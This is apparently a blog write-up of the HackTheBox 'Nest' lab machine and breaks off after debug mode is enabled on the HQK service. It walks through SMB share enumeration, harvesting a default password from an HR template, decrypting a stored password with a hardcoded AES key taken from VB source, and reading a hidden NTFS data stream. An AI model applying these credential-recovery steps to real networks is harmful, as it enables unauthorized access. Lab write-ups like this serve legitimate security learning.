Hackthebox - Write up of Nest machine
19 Jun 2020Hello,
As you guys already know I have been studying pentest. Recently I signed up on hackthebox.eu and started doing some easy machines. This writeup will show the steps I have done to get user and root flag.
I always start with nmap.
$ nmap -T4 -Pn -p- -v 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 21:41 EDT
Initiating Parallel DNS resolution of 1 host. at 21:41
Completed Parallel DNS resolution of 1 host. at 21:41, 0.01s elapsed
Initiating Connect Scan at 21:41
Scanning 10.10.10.178 (10.10.10.178) [65535 ports]
Discovered open port 445/tcp on 10.10.10.178
Connect Scan Timing: About 3.75% done; ETC: 21:55 (0:13:16 remaining)
Connect Scan Timing: About 16.48% done; ETC: 21:47 (0:05:09 remaining)
Connect Scan Timing: About 39.14% done; ETC: 21:45 (0:02:21 remaining)
Connect Scan Timing: About 66.62% done; ETC: 21:44 (0:01:01 remaining)
Discovered open port 4386/tcp on 10.10.10.178
Completed Connect Scan at 21:44, 220.62s elapsed (65535 total ports)
Nmap scan report for 10.10.10.178 (10.10.10.178)
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
445/tcp open microsoft-ds
4386/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 220.71 secondsPort 4386 seems different, will try some telnet to it, and enumerate:
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>debug 1
Invalid password entered
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES
>setdir C:\Windows\Temp
Error: Access to the path 'C:\Windows\Temp\' is denied.
>Now let’s see what samba hides:
$ smbclient -L \\\\10.10.10.178\\
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup availableListing everything with smbmap:
$ smbmap -H 10.10.10.178 -R --depth 10 -p a
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 .
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
Data READ ONLY
.\
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 .
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
.\Shared\
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 .
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 ..
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 Maintenance
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Templates
.\Shared\Maintenance\
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 .
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 ..
-r--r--r-- 48 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt
.\Shared\Templates\
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 .
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 ..
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 HR
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Marketing
.\Shared\Templates\HR\
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 .
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 ..
-r--r--r-- 425 Wed Aug 7 18:55:36 2019 Welcome Email.txt
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
.
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 .
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser
Users READ ONLY
.\
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 .
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUserDownload the files we saw:
$ smbget -R smb://10.10.10.178/Data/Shared
Password for [kali] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user kali
smb://10.10.10.178/Data/Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data/Shared/Templates/HR/Welcome Email.txt
Downloaded 473b in 11 secondsPerfect we have something there checking what is inside the file:
$ cat Templates/HR/Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
kali@kali:~/sharedcat Maintenance/Maintenance\ Alerts.txt
There is currently no scheduled maintenance workTrying to list everything with this new user and credentials:
$ smbmap -H 10.10.10.178 -R --depth 10 -u TempUser -p welcome2019
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 .
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
Data READ ONLY
.\
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 .
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
.\IT\
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 .
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 Archive
dr--r--r-- 0 Wed Aug 7 18:59:34 2019 Configs
dr--r--r-- 0 Wed Aug 7 18:08:30 2019 Installs
dr--r--r-- 0 Sat Jan 25 19:09:13 2020 Reports
dr--r--r-- 0 Mon Aug 5 18:33:51 2019 Tools
.\IT\Configs\
dr--r--r-- 0 Wed Aug 7 18:59:34 2019 .
dr--r--r-- 0 Wed Aug 7 18:59:34 2019 ..
dr--r--r-- 0 Wed Aug 7 15:20:13 2019 Adobe
dr--r--r-- 0 Tue Aug 6 07:16:34 2019 Atlas
dr--r--r-- 0 Tue Aug 6 09:27:08 2019 DLink
dr--r--r-- 0 Wed Aug 7 15:23:26 2019 Microsoft
dr--r--r-- 0 Wed Aug 7 15:33:54 2019 NotepadPlusPlus
dr--r--r-- 0 Wed Aug 7 16:01:13 2019 RU Scanner
dr--r--r-- 0 Tue Aug 6 09:27:09 2019 Server Manager
.\IT\Configs\Adobe\
dr--r--r-- 0 Wed Aug 7 15:20:13 2019 .
dr--r--r-- 0 Wed Aug 7 15:20:13 2019 ..
-r--r--r-- 246 Wed Aug 7 15:20:13 2019 editing.xml
-r--r--r-- 0 Wed Aug 7 15:20:09 2019 Options.txt
-r--r--r-- 258 Wed Aug 7 15:20:09 2019 projects.xml
-r--r--r-- 1274 Wed Aug 7 15:20:09 2019 settings.xml
.\IT\Configs\Atlas\
dr--r--r-- 0 Tue Aug 6 07:16:34 2019 .
dr--r--r-- 0 Tue Aug 6 07:16:34 2019 ..
-r--r--r-- 1369 Tue Aug 6 07:18:38 2019 Temp.XML
.\IT\Configs\Microsoft\
dr--r--r-- 0 Wed Aug 7 15:23:26 2019 .
dr--r--r-- 0 Wed Aug 7 15:23:26 2019 ..
-r--r--r-- 4598 Wed Aug 7 15:23:26 2019 Options.xml
.\IT\Configs\NotepadPlusPlus\
dr--r--r-- 0 Wed Aug 7 15:33:54 2019 .
dr--r--r-- 0 Wed Aug 7 15:33:54 2019 ..
-r--r--r-- 6451 Wed Aug 7 19:01:25 2019 config.xml
-r--r--r-- 2108 Wed Aug 7 19:00:36 2019 shortcuts.xml
.\IT\Configs\RU Scanner\
dr--r--r-- 0 Wed Aug 7 16:01:13 2019 .
dr--r--r-- 0 Wed Aug 7 16:01:13 2019 ..
-r--r--r-- 270 Thu Aug 8 15:49:37 2019 RU_config.xml
.\Shared\
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 .
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 ..
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 Maintenance
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Templates
.\Shared\Maintenance\
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 .
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 ..
-r--r--r-- 48 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt
.\Shared\Templates\
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 .
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 ..
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 HR
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Marketing
.\Shared\Templates\HR\
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 .
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 ..
-r--r--r-- 425 Wed Aug 7 18:55:36 2019 Welcome Email.txt
IPC$ NO ACCESS Remote IPC
.
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 .
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 ..
dr--r--r-- 0 Wed Aug 7 15:40:25 2019 Finance
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 HR
dr--r--r-- 0 Thu Aug 8 06:59:25 2019 IT
Secure$ READ ONLY
.\
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 .
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 ..
dr--r--r-- 0 Wed Aug 7 15:40:25 2019 Finance
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 HR
dr--r--r-- 0 Thu Aug 8 06:59:25 2019 IT
.
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 .
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser
Users READ ONLY
.\
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 .
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser
.\TempUser\
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 .
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 ..
-r--r--r-- 0 Wed Aug 7 18:56:02 2019 New Text Document.txtDownloading everything again:
$ smbget -R smb://10.10.10.178/Data/IT/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data/IT//Configs/Adobe/editing.xml
smb://10.10.10.178/Data/IT//Configs/Adobe/Options.txt
smb://10.10.10.178/Data/IT//Configs/Adobe/projects.xml
smb://10.10.10.178/Data/IT//Configs/Adobe/settings.xml
smb://10.10.10.178/Data/IT//Configs/Atlas/Temp.XML
smb://10.10.10.178/Data/IT//Configs/Microsoft/Options.xml
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data/IT//Configs/RU Scanner/RU_config.xml If we look inside the files we can see some hashed password on RU_config.xml
$ cat Configs/RU\ Scanner/RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>Looking the other files we find some other interesting things:
$ tail Configs/NotepadPlusPlus/config.xml
<Find name="redeem on" />
<Find name="192" />
<Replace name="C_addEvent" />
</FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>Checking Temp.xml
$ cat Configs/Atlas/Temp.XML
<?xml version="1.0" encoding="UTF-8"?>
<bs:Brainstorm xmlns:bs="http://schemas.microsoft.com/visio/2003/brainstorming"><bs:topic bs:TopicID="T1"><bs:text>Marketing Plan</bs:text><bs:topic bs:TopicID="T1.1"><bs:text>Product</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Deanna Meyer</bs:value></bs:prop><bs:topic bs:TopicID="T1.1.1"><bs:text>New features</bs:text></bs:topic><bs:topic bs:TopicID="T1.1.2"><bs:text>Competitive strengths</bs:text></bs:topic><bs:topic bs:TopicID="T1.1.3"><bs:text>Competitive weaknesses</bs:text></bs:topic></bs:topic><bs:topic bs:TopicID="T1.2"><bs:text>Placement</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Jolie Lenehan</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.3"><bs:text>Price</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'Hara</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.4"><bs:text>Promotion</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'Hara</bs:value></bs:prop><bs:topic bs:TopicID="T1.4.1"><bs:text>Advertising</bs:text></bs:topic><bs:topic bs:TopicID="T1.4.2"><bs:text>Mailings</bs:text></bs:topic><bs:topic bs:TopicID="T1.4.3"><bs:text>Trade shows</bs:text></bs:topic></bs:topic></bs:topic><bs:association bs:topic1="T1.4" bs:topic2="T1.3"/></bs:Brainstorm>Some possible names for users. As we know the Secure$ path from recent files let’s try to dig into it directly:
$ smbmap -H 10.10.10.178 -R Secure$/IT/Carl --depth 10 -p welcome2019 -u TempUser
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
.
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 .
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 ..
dr--r--r-- 0 Wed Aug 7 15:40:25 2019 Finance
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 HR
dr--r--r-- 0 Thu Aug 8 06:59:25 2019 IT
Secure$ READ ONLY
.IT\Carl\
dr--r--r-- 0 Wed Aug 7 15:42:14 2019 .
dr--r--r-- 0 Wed Aug 7 15:42:14 2019 ..
dr--r--r-- 0 Wed Aug 7 15:44:00 2019 Docs
dr--r--r-- 0 Tue Aug 6 09:45:47 2019 Reports
dr--r--r-- 0 Tue Aug 6 10:41:55 2019 VB Projects
.IT\Carl\Docs\
dr--r--r-- 0 Wed Aug 7 15:44:00 2019 .
dr--r--r-- 0 Wed Aug 7 15:44:00 2019 ..
-r--r--r-- 56 Wed Aug 7 15:44:16 2019 ip.txt
-r--r--r-- 73 Wed Aug 7 15:43:46 2019 mmc.txt
.IT\Carl\VB Projects\
dr--r--r-- 0 Tue Aug 6 10:41:55 2019 .
dr--r--r-- 0 Tue Aug 6 10:41:55 2019 ..
dr--r--r-- 0 Tue Aug 6 10:41:53 2019 Production
dr--r--r-- 0 Tue Aug 6 10:47:41 2019 WIP
.IT\Carl\VB Projects\WIP\
dr--r--r-- 0 Tue Aug 6 10:47:41 2019 .
dr--r--r-- 0 Tue Aug 6 10:47:41 2019 ..
dr--r--r-- 0 Fri Aug 9 11:36:45 2019 RU
.IT\Carl\VB Projects\WIP\RU\
dr--r--r-- 0 Fri Aug 9 11:36:45 2019 .
dr--r--r-- 0 Fri Aug 9 11:36:45 2019 ..
dr--r--r-- 0 Wed Aug 7 18:05:54 2019 RUScanner
-r--r--r-- 871 Fri Aug 9 11:36:35 2019 RUScanner.sln
.IT\Carl\VB Projects\WIP\RU\RUScanner\
dr--r--r-- 0 Wed Aug 7 18:05:54 2019 .
dr--r--r-- 0 Wed Aug 7 18:05:54 2019 ..
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 bin
-r--r--r-- 772 Wed Aug 7 18:05:09 2019 ConfigFile.vb
-r--r--r-- 279 Wed Aug 7 18:05:44 2019 Module1.vb
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 My Project
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 obj
-r--r--r-- 4828 Fri Aug 9 11:38:30 2019 RU Scanner.vbproj
-r--r--r-- 143 Wed Aug 7 16:00:28 2019 RU Scanner.vbproj.user
-r--r--r-- 133 Wed Aug 7 18:05:58 2019 SsoIntegration.vb
-r--r--r-- 4888 Wed Aug 7 18:06:03 2019 Utils.vb
.IT\Carl\VB Projects\WIP\RU\RUScanner\bin\
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 .
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 ..
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 Debug
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 Release
.IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 .
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 ..
-r--r--r-- 441 Wed Aug 7 16:00:11 2019 Application.Designer.vb
-r--r--r-- 481 Wed Aug 7 16:00:11 2019 Application.myapp
-r--r--r-- 1163 Wed Aug 7 16:00:11 2019 AssemblyInfo.vb
-r--r--r-- 2776 Wed Aug 7 16:00:11 2019 Resources.Designer.vb
-r--r--r-- 5612 Wed Aug 7 16:00:11 2019 Resources.resx
-r--r--r-- 2989 Wed Aug 7 16:00:11 2019 Settings.Designer.vb
-r--r--r-- 279 Wed Aug 7 16:00:11 2019 Settings.settings
.IT\Carl\VB Projects\WIP\RU\RUScanner\obj\
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 .
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 ..
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 x86Tons of files there let’s download them:
$ smbget -R smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 25.18kB in 39 secondsChecking their content we see:
$ cat VB\ Projects/WIP/RU/RUScanner/Module1.vb
Module Module1
Sub Main()
Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
End Sub
End ModuleSo this seems to point it uses the RU_Config.xml we found, maybe the algo to decrypt is here. Utils.vb seems to have something related to this. Taking a closer look on utils.decrypt
Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function
Public Shared Function Decrypt(ByVal cipherText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String
Dim initVectorBytes As Byte()
initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte()
saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)
Dim keyBytes As Byte()
keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream
memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream
cryptoStream = New CryptoStream(memoryStream, _
decryptor, _
CryptoStreamMode.Read)
Dim plainTextBytes As Byte()
ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer
decryptedByteCount = cryptoStream.Read(plainTextBytes, _
0, _
plainTextBytes.Length)
memoryStream.Close()
cryptoStream.Close()
Dim plainText As String
plainText = Encoding.ASCII.GetString(plainTextBytes, _
0, _
decryptedByteCount)
Return plainText
End FunctionThis seems to be the related password. If we use this to build our own vb file.
Imports System
Imports System.Text
Imports System.Security.Cryptography
Public Module Module1
Public Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function
Public Function Decrypt(ByVal cipherText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String
Dim initVectorBytes As Byte()
initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte()
saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)
Dim keyBytes As Byte()
keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream
memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream
cryptoStream = New CryptoStream(memoryStream, _
decryptor, _
CryptoStreamMode.Read)
Dim plainTextBytes As Byte()
ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer
decryptedByteCount = cryptoStream.Read(plainTextBytes, _
0, _
plainTextBytes.Length)
memoryStream.Close()
cryptoStream.Close()
Dim plainText As String
plainText = Encoding.ASCII.GetString(plainTextBytes, _
0, _
decryptedByteCount)
Return plainText
End Function
Public Sub Main()
Dim plain As String
plain = DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
Console.WriteLine(plain)
End Sub
End ModuleNote that the DecryptString receive the parameter from RU_Config.xml
Running it on dotnetfiddle we get: “xRxRxPANCAK3SxRxRx”, therefore user c.smith must have this password. Trying to list everything with this new user:
$ smbmap -H 10.10.10.178 -R --depth 10 -p xRxRxPANCAK3SxRxRx -u C.SmithWe will see some different files on his folder and the user flag. Download everything again.
$ smbget -R smb://10.10.10.178/Users/C.Smith -U c.smith
Password for [c.smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/C.Smith/user.txt
Downloaded 17.27kB in 12 secondsDebug mode password.txt is empty which is weird lets try to get more information about it.
$ smbclient -H \\\\10.10.10.178\\Users/ -U c.smith
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> cd C.Smith
dirsmb: \C.Smith\> dir
. D 0 Sun Jan 26 02:21:44 2020
.. D 0 Sun Jan 26 02:21:44 2020
HQK Reporting D 0 Thu Aug 8 19:06:17 2019
user.txt A 32 Thu Aug 8 19:05:24 2019
cd
10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\> cd HQK Reporting\
cd \C.Smith\HQK\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \C.Smith\> cd "HQK Reporting"
smb: \C.Smith\HQK Reporting\> dir
. D 0 Thu Aug 8 19:06:17 2019
.. D 0 Thu Aug 8 19:06:17 2019
AD Integration Module D 0 Fri Aug 9 08:18:42 2019
Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019
HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019
10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\HQK Reporting\> allinfo " Debug Mode Password.txt"
NT_STATUS_OBJECT_NAME_NOT_FOUND getting alt name for \C.Smith\HQK Reporting\ Debug Mode Password.txt
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 07:06:12 PM 2019 EDT
access_time: Thu Aug 8 07:06:12 PM 2019 EDT
write_time: Thu Aug 8 07:08:17 PM 2019 EDT
change_time: Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> It has another stream of data called Password. Let’s download it:
smb: get "Debug Mode Password.txt":password
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:password of size 15 as Debug Mode Password.txt:password (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)Cat it we see: “WBQ201953D8w”
Dope. Another password. Let’s go back to HQK.
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>debug xRxRxPANCAK3SxRxRx
Invalid password entered
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>session
--- Session Information ---
Session ID: 26ecec2e-c357-4860-8f29-d8045141cb6a
Debug: True
Started At: 6/2/2020 4:19:47 AM
Server Endpoint: 10.10.10.178:4386
